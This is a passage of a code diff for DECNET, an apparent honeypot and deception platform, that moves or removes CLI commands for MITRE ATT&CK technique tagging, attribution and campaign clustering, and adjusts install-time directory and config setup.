# `ttp` runs on agents — local SMTP decoys persist .eml files into the
|
||||
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
|
||||
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
|
||||
"ttp-backfill",
|
||||
})
|
||||
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
||||
{"swarm", "topology", "geoip", "realism"}
|
||||
@@ -69,7 +65,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
|
||||
return
|
||||
_app.registered_commands = [
|
||||
c for c in _app.registered_commands
|
||||
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
|
||||
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
|
||||
]
|
||||
_app.registered_groups = [
|
||||
g for g in _app.registered_groups
|
||||
|
||||
@@ -44,12 +44,6 @@ _CONFIG_PLACEHOLDER = """\
|
||||
# EnvironmentFile= — never in a group-readable INI.
|
||||
|
||||
[decnet]
|
||||
# DECNET-service user/group as configured at `decnet init` time.
|
||||
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
|
||||
# so the same user name can have different numeric uids on master vs
|
||||
# agents without breaking artifact ownership.
|
||||
api-user = {api_user}
|
||||
api-group = {api_group}
|
||||
# mode = master # or "agent"
|
||||
|
||||
# [api]
|
||||
@@ -80,7 +74,6 @@ api-group = {api_group}
|
||||
# master-host = 10.0.0.1
|
||||
# syslog-port = 6514
|
||||
# swarmctl-port = 8770
|
||||
# swarmctl-host = 127.0.0.1
|
||||
|
||||
# [logging]
|
||||
# system-log = /var/log/decnet/decnet.system.log
|
||||
@@ -204,17 +197,14 @@ def _ensure_dir(
|
||||
return f"skip: {path} already present" if existed else "ok"
|
||||
|
||||
|
||||
def _ensure_config(
|
||||
path: Path, group: str, *, user: str, dry_run: bool,
|
||||
) -> str:
|
||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
|
||||
if path.exists():
|
||||
return f"skip: {path} already present"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would write:[/] {path}")
|
||||
return "ok"
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
|
||||
path.write_text(rendered)
|
||||
path.write_text(_CONFIG_PLACEHOLDER)
|
||||
try:
|
||||
os.chmod(path, 0o640)
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
@@ -611,7 +601,7 @@ def register(app: typer.Typer) -> None:
|
||||
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
||||
_install_rel = install_dir.lstrip("/")
|
||||
|
||||
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
|
||||
required_tools = ("systemctl",) if deinit else (
|
||||
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
||||
)
|
||||
if deinit:
|
||||
@@ -668,7 +658,7 @@ def register(app: typer.Typer) -> None:
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
_step(
|
||||
f"remove {etc_decnet / 'decnet.ini'}",
|
||||
@@ -764,13 +754,6 @@ def register(app: typer.Typer) -> None:
|
||||
(pfx / _install_rel, 0o755, user, group),
|
||||
(pfx / "var/lib/decnet", 0o750, user, group),
|
||||
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
||||
# DEBT-035 / DEBT-047: artifact root carries setgid (the
|
||||
# 0o2... bit) so every file written under it inherits the
|
||||
# decnet group regardless of which container's uid created
|
||||
# it. Group-write (0o2775) lets the API process and the
|
||||
# local TTP worker read each other's outputs without a
|
||||
# manual chown after every fresh deploy.
|
||||
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
|
||||
(pfx / "var/log/decnet", 0o750, user, group),
|
||||
(etc_decnet, 0o755, "root", group),
|
||||
(pfx / "run/decnet", 0o755, "root", group),
|
||||
@@ -792,15 +775,12 @@ def register(app: typer.Typer) -> None:
|
||||
for path, mode, d_owner, d_group in dirs:
|
||||
_step(
|
||||
f"ensure dir {path}",
|
||||
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
|
||||
lambda p=path, m=mode, o=d_owner, g=d_group:
|
||||
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"write {etc_decnet / 'decnet.ini'}",
|
||||
lambda: _ensure_config(
|
||||
etc_decnet / "decnet.ini", group,
|
||||
user=user, dry_run=dry_run,
|
||||
),
|
||||
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
"install systemd units",
|
||||
@@ -832,7 +812,7 @@ def register(app: typer.Typer) -> None:
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
|
||||
if no_start:
|
||||
@@ -843,7 +823,7 @@ def register(app: typer.Typer) -> None:
|
||||
_step(
|
||||
"systemctl enable --now decnet.target",
|
||||
lambda: (
|
||||
_run( # type: ignore[func-returns-value]
|
||||
_run(
|
||||
["systemctl", "enable", "--now", "decnet.target"],
|
||||
dry_run=dry_run,
|
||||
),
|
||||
|
||||
@@ -16,16 +16,8 @@ from .utils import console, log
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def swarmctl(
|
||||
port: int = typer.Option(
|
||||
8770, "--port",
|
||||
envvar="DECNET_SWARMCTL_PORT",
|
||||
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||
),
|
||||
host: str = typer.Option(
|
||||
"127.0.0.1", "--host",
|
||||
envvar="DECNET_SWARMCTL_HOST",
|
||||
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||
),
|
||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||
|
||||
@@ -233,8 +233,8 @@ def _delete(
|
||||
topo = await repo.get_topology(topology_id)
|
||||
if topo is None:
|
||||
return False, "not-found"
|
||||
if topo.status in _RUNNING:
|
||||
return False, str(topo.status)
|
||||
if topo["status"] in _RUNNING:
|
||||
return False, str(topo["status"])
|
||||
ok = await repo.delete_topology_cascade(topology_id)
|
||||
return ok, None
|
||||
|
||||
|
||||
@@ -1,309 +0,0 @@
|
||||
"""``decnet ttp`` — TTP-tagging worker and admin commands.
|
||||
|
||||
Two flat commands share this module:
|
||||
|
||||
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
|
||||
``attacker.session.ended`` / ``attacker.observed`` /
|
||||
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
|
||||
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
|
||||
dispatches each event through :class:`CompositeTagger` (RuleEngine +
|
||||
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
|
||||
lifters), persists ``ttp_tag`` rows via the idempotent
|
||||
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
|
||||
``ttp.rule.fired.<technique_id>`` only when the insert returned a
|
||||
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
|
||||
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
|
||||
so its argv must stay stable.
|
||||
|
||||
* ``decnet ttp-backfill`` — replays historical events (shell commands
|
||||
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
|
||||
through the live tagger. Writes ``ttp_tag`` rows using the same
|
||||
idempotent insert path. **Does not publish** to the bus — replay must
|
||||
not re-trigger SIEM/webhook fan-out on already-attributed events.
|
||||
|
||||
Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
|
||||
:mod:`decnet.cli.gating`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import time
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from typing import Any
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.ttp.factory import CompositeTagger, get_tagger
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
_BACKFILL_SOURCES = ("command", "canary", "all")
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="ttp")
|
||||
def ttp(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
|
||||
from decnet.ttp.worker import run_ttp_worker_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info("ttp daemonizing poll=%s", poll_interval_secs)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("ttp command invoked poll=%s", poll_interval_secs)
|
||||
console.print(
|
||||
f"[bold cyan]TTP tagging worker starting[/] "
|
||||
f"poll={poll_interval_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_ttp_worker_loop(
|
||||
repo, poll_interval_secs=poll_interval_secs,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]TTP tagging worker stopped.[/]")
|
||||
|
||||
@app.command(name="ttp-backfill")
|
||||
def ttp_backfill(
|
||||
since_days: int = typer.Option(
|
||||
7, "--since-days", "-s",
|
||||
min=1, max=3650,
|
||||
help="Replay events whose source row is newer than N days ago.",
|
||||
),
|
||||
source: str = typer.Option(
|
||||
"all", "--source",
|
||||
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
|
||||
),
|
||||
dry_run: bool = typer.Option(
|
||||
False, "--dry-run",
|
||||
help="Run the tagger but skip insert_tags. Reports counts only.",
|
||||
),
|
||||
batch_size: int = typer.Option(
|
||||
500, "--batch-size",
|
||||
min=1, max=100_000,
|
||||
help="Number of tags accumulated before each repo.insert_tags call.",
|
||||
),
|
||||
) -> None:
|
||||
"""Replay historical attacker activity through the live tagger.
|
||||
|
||||
Walks ``Attacker.commands`` (per-IP shell-command history) and
|
||||
``CanaryTrigger`` (canary callback log) since N days ago,
|
||||
builds the same :class:`TaggerEvent` shape the live worker
|
||||
emits, and persists tags via the idempotent INSERT OR IGNORE
|
||||
write. Re-running is safe — a second pass over identical
|
||||
source rows reports ``inserted=0``.
|
||||
|
||||
Bus publish is intentionally suppressed; SIEM / webhook fan-out
|
||||
sees only live events, never replays.
|
||||
"""
|
||||
from decnet.cli.gating import _require_master_mode
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
_require_master_mode("ttp-backfill")
|
||||
|
||||
if source not in _BACKFILL_SOURCES:
|
||||
console.print(
|
||||
f"[red]invalid --source {source!r}; expected one of "
|
||||
f"{_BACKFILL_SOURCES}[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
|
||||
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
|
||||
console.print(
|
||||
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
|
||||
f"source={source} dry_run={dry_run} batch_size={batch_size}"
|
||||
)
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await _backfill(
|
||||
repo,
|
||||
cutoff=cutoff,
|
||||
sources=_resolve_sources(source),
|
||||
dry_run=dry_run,
|
||||
batch_size=batch_size,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Backfill interrupted.[/]")
|
||||
|
||||
|
||||
def _resolve_sources(name: str) -> tuple[str, ...]:
|
||||
if name == "all":
|
||||
return ("command", "canary")
|
||||
return (name,)
|
||||
|
||||
|
||||
async def _backfill(
|
||||
repo: Any,
|
||||
*,
|
||||
cutoff: datetime,
|
||||
sources: tuple[str, ...],
|
||||
dry_run: bool,
|
||||
batch_size: int,
|
||||
) -> None:
|
||||
"""Drive the per-source backfill loops and report structured counts.
|
||||
|
||||
One :class:`CompositeTagger` is built once and reused for every
|
||||
source — the per-lifter watch fan-out the live worker performs is
|
||||
inlined here as a `watch_store()` startup task per
|
||||
:class:`WatchableTagger`, so the dispatch indexes hydrate before
|
||||
we start feeding events.
|
||||
"""
|
||||
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
|
||||
# to inject a recording fake without touching the global factory.
|
||||
tagger = get_tagger()
|
||||
watch_tasks: list[asyncio.Task[None]] = []
|
||||
if isinstance(tagger, CompositeTagger):
|
||||
for watchable in tagger.iter_watchables():
|
||||
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
|
||||
# Yield once so each watch_store gets a chance to run its
|
||||
# initial `load_compiled` before we feed the first event.
|
||||
await asyncio.sleep(0.05)
|
||||
|
||||
try:
|
||||
if "command" in sources:
|
||||
await _backfill_commands(
|
||||
repo, tagger, cutoff=cutoff,
|
||||
dry_run=dry_run, batch_size=batch_size,
|
||||
)
|
||||
if "canary" in sources:
|
||||
await _backfill_canaries(
|
||||
repo, tagger, cutoff=cutoff,
|
||||
dry_run=dry_run, batch_size=batch_size,
|
||||
)
|
||||
finally:
|
||||
for task in watch_tasks:
|
||||
task.cancel()
|
||||
for task in watch_tasks:
|
||||
try:
|
||||
await task
|
||||
except (asyncio.CancelledError, Exception): # noqa: BLE001
|
||||
pass
|
||||
|
||||
|
||||
async def _backfill_commands(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
) -> None:
    """Replay stored attacker commands through *tagger* and persist the tags.

    Iterates ``repo.iter_attacker_commands_since(cutoff)``, which yields
    ``(attacker, commands)`` pairs. Each command that carries a string
    under ``command_text`` (or ``text``) becomes a ``source_kind="command"``
    :class:`TaggerEvent`. Tags returned by the tagger are buffered and
    flushed through :func:`_flush` whenever the buffer reaches
    *batch_size*, plus once at the end. A one-line summary with the
    counters and elapsed time is printed when the loop finishes.
    """
    from decnet.ttp.base import TaggerEvent

    t0 = time.monotonic()
    attacker_rows = 0
    command_total = 0
    inserted_total = 0
    buffer: list[Any] = []

    async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
        attacker_rows += 1
        for position, cmd in enumerate(commands):
            command_total += 1
            text = cmd.get("command_text") or cmd.get("text")
            if not isinstance(text, str):
                # Still counted above, but there is nothing to tag.
                continue

            # Prefer an identifier stored on the command; otherwise derive
            # one from the attacker uuid and the command's position.
            source_id = (
                cmd.get("id")
                or cmd.get("uuid")
                or cmd.get("command_id")
                or f"{attacker.uuid}#cmd{position}"
            )
            produced = await tagger.tag(
                TaggerEvent(
                    source_kind="command",
                    source_id=str(source_id),
                    attacker_uuid=attacker.uuid,
                    identity_uuid=getattr(attacker, "identity_id", None),
                    session_id=cmd.get("session_id"),
                    decky_id=cmd.get("decky_id") or cmd.get("decky"),
                    payload={**cmd, "command_text": text},
                )
            )
            if produced:
                buffer.extend(produced)
            if len(buffer) >= batch_size:
                inserted_total += await _flush(repo, buffer, dry_run)
                # Rebind rather than clear: the flushed list was handed to
                # the repository and must not be mutated afterwards.
                buffer = []

    if buffer:
        inserted_total += await _flush(repo, buffer, dry_run)

    duration = time.monotonic() - t0
    console.print(
        f"source=command rows={attacker_rows} commands={command_total} "
        f"inserted={inserted_total} dry_run={dry_run} elapsed_s={duration:.2f}"
    )
|
||||
|
||||
|
||||
async def _backfill_canaries(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
) -> None:
    """Replay stored canary triggers through *tagger* and persist the tags.

    Every trigger yielded by ``repo.iter_canary_triggers_since(cutoff)``
    is wrapped in a ``source_kind="canary_fingerprint"``
    :class:`TaggerEvent` whose payload carries the trigger's token, source
    IP, user agent, request path, DNS query name and headers. Resulting
    tags are buffered and flushed through :func:`_flush` whenever the
    buffer reaches *batch_size*, plus once at the end. A one-line summary
    is printed when the loop finishes.
    """
    from decnet.ttp.base import TaggerEvent

    t0 = time.monotonic()
    trigger_rows = 0
    inserted_total = 0
    buffer: list[Any] = []

    async for trigger in repo.iter_canary_triggers_since(cutoff):
        trigger_rows += 1
        fingerprint = {
            "token_uuid": trigger.token_uuid,
            "src_ip": trigger.src_ip,
            # Same value as ``user_agent`` but never ``None``.
            "ua_signature": trigger.user_agent or "",
            "user_agent": trigger.user_agent,
            "request_path": trigger.request_path,
            "dns_qname": trigger.dns_qname,
            "headers": trigger.headers(),
        }
        produced = await tagger.tag(
            TaggerEvent(
                source_kind="canary_fingerprint",
                source_id=trigger.uuid,
                attacker_uuid=trigger.attacker_id,
                identity_uuid=None,
                session_id=None,
                decky_id=None,
                payload=fingerprint,
            )
        )
        if produced:
            buffer.extend(produced)
        if len(buffer) >= batch_size:
            inserted_total += await _flush(repo, buffer, dry_run)
            # Rebind rather than clear: the flushed list was handed to the
            # repository and must not be mutated afterwards.
            buffer = []

    if buffer:
        inserted_total += await _flush(repo, buffer, dry_run)

    duration = time.monotonic() - t0
    console.print(
        f"source=canary rows={trigger_rows} inserted={inserted_total} "
        f"dry_run={dry_run} elapsed_s={duration:.2f}"
    )
|
||||
|
||||
|
||||
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
    """Write *tags* through ``repo.insert_tags`` and return the insert count.

    In dry-run mode nothing is written and ``0`` is returned. Otherwise
    the awaited result of ``repo.insert_tags(tags)`` is coerced to ``int``.
    """
    if not dry_run:
        written = await repo.insert_tags(tags)
        return int(written)
    return 0
|
||||
@@ -11,7 +11,7 @@ import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable, Optional
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
|
||||
return None
|
||||
|
||||
|
||||
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
|
||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
|
||||
"""Return the microservice registry for health-check and relaunch.
|
||||
|
||||
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
||||
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
|
||||
|
||||
|
||||
def _swarmctl_base_url(url: Optional[str]) -> str:
    """Resolve the swarmctl base URL.

    Precedence: the explicit *url* argument, then the
    ``DECNET_SWARMCTL_URL`` environment variable, then
    ``_DEFAULT_SWARMCTL_URL``. The ``or`` chain is deliberate: an
    environment variable that is set but empty falls through to the
    default instead of yielding an empty base URL.
    """
    return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
|
||||
|
||||
|
||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
||||
|
||||
@@ -192,70 +192,6 @@ def register(app: typer.Typer) -> None:
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||
|
||||
@app.command(name="attribution")
def attribution(
    multi_actor_tick_secs: float = typer.Option(
        60.0,
        "--multi-actor-tick",
        "-t",
        help=(
            "Cross-primitive multi_actor correlator tick interval (seconds). "
            "Walks attribution_state for identities flagged on >= 2 "
            "primitives and emits attribution.profile.multi_actor_suspected."
        ),
    ),
    daemon: bool = typer.Option(
        False,
        "--daemon",
        "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Attribution engine v0 — per-(identity, primitive) state machine.

    Subscribes to ``attacker.observation.>`` and, for each event,
    ensures a stub identity row, runs the merger over the full
    per-(identity, primitive) observation series, upserts the
    derived state, and publishes
    ``attribution.profile.state_changed`` only on transition.
    Periodic tick fires
    ``attribution.profile.multi_actor_suspected`` when >= 2
    primitives flag the same identity.

    Closes DEBT-051. Bright-line scope: behavioural coherence and
    drift only — never persona attribution to natural persons.
    """
    # Imported inside the command body rather than at module level.
    import asyncio

    from decnet.correlation.attribution_worker import run_attribution_loop
    from decnet.web.dependencies import repo

    if daemon:
        # Log before detaching so the message is emitted by the
        # foreground process.
        log.info(
            "attribution worker daemonizing tick=%s",
            multi_actor_tick_secs,
        )
        _utils._daemonize()

    log.info(
        "attribution worker command invoked tick=%s",
        multi_actor_tick_secs,
    )
    console.print(
        f"[bold cyan]Attribution engine starting[/] "
        f"multi_actor_tick={multi_actor_tick_secs}s"
    )
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _serve() -> None:
        # The repository must be initialised on the same loop that runs
        # the worker.
        await repo.initialize()
        await run_attribution_loop(
            repo,
            multi_actor_tick_secs=multi_actor_tick_secs,
        )

    try:
        asyncio.run(_serve())
    except KeyboardInterrupt:
        console.print("\n[yellow]Attribution engine stopped.[/]")
|
||||
|
||||
@app.command(name="clusterer")
|
||||
def clusterer(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
@@ -359,10 +295,3 @@ def register(app: typer.Typer) -> None:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||
|
||||
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
|
||||
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
|
||||
# is colocated there, mirroring the per-feature CLI split used by
|
||||
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
|
||||
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
|
||||
# ``decnet ttp`` because the command name is unchanged.
|
||||
|
||||
@@ -66,10 +66,7 @@ def cluster_identities(
|
||||
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
||||
|
||||
|
||||
def from_identity_row(
|
||||
row: dict[str, Any],
|
||||
ttp_decky_phases: list[dict[str, Any]] | None = None,
|
||||
) -> IdentityFeatures:
|
||||
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
||||
"""Project an ``AttackerIdentity`` projection row dict into an
|
||||
:class:`IdentityFeatures`.
|
||||
|
||||
@@ -78,59 +75,20 @@ def from_identity_row(
|
||||
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
||||
(JSON list[str] or null).
|
||||
|
||||
*ttp_decky_phases* is the optional per-identity payload from
|
||||
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
|
||||
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
|
||||
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
|
||||
populates :attr:`IdentityFeatures.first_phase_per_decky` /
|
||||
``last_phase_per_decky`` / ``first_seen_per_decky`` /
|
||||
``last_seen_per_decky`` so the production phase-handoff edge
|
||||
finally fires. The synthetic fixture path
|
||||
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
|
||||
emitting UKC directly.
|
||||
Phase-handoff fields stay empty until the production-row adapter
|
||||
learns to mine logs for per-decky phase sequences (TODO.md
|
||||
"production-side payload + C2 + commands joins"). Without those,
|
||||
the campaign clusterer falls back to shared-infra + temporal
|
||||
overlap + cohort signals on production data; the fixture path
|
||||
exercises the full feature set via :func:`from_synthetic_identity`.
|
||||
"""
|
||||
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
|
||||
|
||||
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
||||
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
||||
|
||||
first_phase_per_decky: dict[str, str] = {}
|
||||
last_phase_per_decky: dict[str, str] = {}
|
||||
first_seen_per_decky: dict[str, float] = {}
|
||||
last_seen_per_decky: dict[str, float] = {}
|
||||
decky_set: set[str] = set()
|
||||
|
||||
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
|
||||
# the FIRST observation per decky, plain assignment captures the
|
||||
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
|
||||
# phase is pre-target / unobservable) are dropped — they should
|
||||
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
|
||||
for entry in ttp_decky_phases or []:
|
||||
decky = entry.get("decky_id")
|
||||
tactic = entry.get("tactic")
|
||||
created_at_ts = entry.get("created_at_ts")
|
||||
if not isinstance(decky, str) or not isinstance(tactic, str):
|
||||
continue
|
||||
phase = tactic_to_ukc_phase(tactic)
|
||||
if phase is None:
|
||||
continue
|
||||
ts = float(created_at_ts) if isinstance(
|
||||
created_at_ts, (int, float)) else 0.0
|
||||
decky_set.add(decky)
|
||||
first_phase_per_decky.setdefault(decky, phase.value)
|
||||
last_phase_per_decky[decky] = phase.value
|
||||
first_seen_per_decky.setdefault(decky, ts)
|
||||
last_seen_per_decky[decky] = ts
|
||||
|
||||
return IdentityFeatures(
|
||||
identity_uuid=row["uuid"],
|
||||
payload_hashes=frozenset(payload_hashes),
|
||||
c2_endpoints=frozenset(c2_endpoints),
|
||||
decky_set=frozenset(decky_set),
|
||||
first_phase_per_decky=first_phase_per_decky,
|
||||
last_phase_per_decky=last_phase_per_decky,
|
||||
first_seen_per_decky=first_seen_per_decky,
|
||||
last_seen_per_decky=last_seen_per_decky,
|
||||
)
|
||||
|
||||
|
||||
@@ -174,26 +132,8 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
|
||||
# merged out — their winner is the active row and gets clustered
|
||||
# on its own. This keeps the campaign graph from double-counting.
|
||||
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
||||
# Pull TTP-derived per-decky phase observations per identity
|
||||
# (E.3.15). Failures here are non-fatal — the clusterer falls
|
||||
# back to the empty phase-handoff signal, same as the legacy
|
||||
# behavior, so a partial repo doesn't take the worker down.
|
||||
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
|
||||
for r in active_rows:
|
||||
try:
|
||||
decky_phases_by_identity[r["uuid"]] = (
|
||||
await repo.list_ttp_decky_phases(r["uuid"])
|
||||
)
|
||||
except Exception: # noqa: BLE001
|
||||
log.warning(
|
||||
"campaign clusterer: list_ttp_decky_phases failed "
|
||||
"for identity %s; phase-handoff edge inert",
|
||||
r["uuid"],
|
||||
)
|
||||
decky_phases_by_identity[r["uuid"]] = []
|
||||
feature_list: list[IdentityFeatures] = [
|
||||
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
|
||||
for r in active_rows
|
||||
from_identity_row(r) for r in active_rows
|
||||
]
|
||||
row_by_uuid: dict[str, dict[str, Any]] = {
|
||||
r["uuid"]: r for r in active_rows
|
||||
|
||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||
|
||||
|
||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||
|
||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||
|
||||
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -363,9 +363,8 @@ async def _roll_up_fingerprints(
|
||||
breaks the clusterer tick — the columns just stay stale until the
|
||||
next pass."""
|
||||
summaries = extract_fp_summaries(member_rows)
|
||||
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
|
||||
try:
|
||||
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
|
||||
await repo.update_identity_fingerprints(identity_uuid, **summaries)
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception(
|
||||
"clusterer: failed to roll up fingerprints for identity=%s",
|
||||
|
||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||
|
||||
|
||||
def from_synthetic(att) -> Observation:
|
||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||
|
||||
Lives here so test code doesn't import the factory shape into the
|
||||
|
||||
@@ -15,7 +15,6 @@ emits no events for unobservable phases.
|
||||
from __future__ import annotations
|
||||
|
||||
from enum import Enum
|
||||
from typing import Final
|
||||
|
||||
|
||||
class UKCPhase(str, Enum):
|
||||
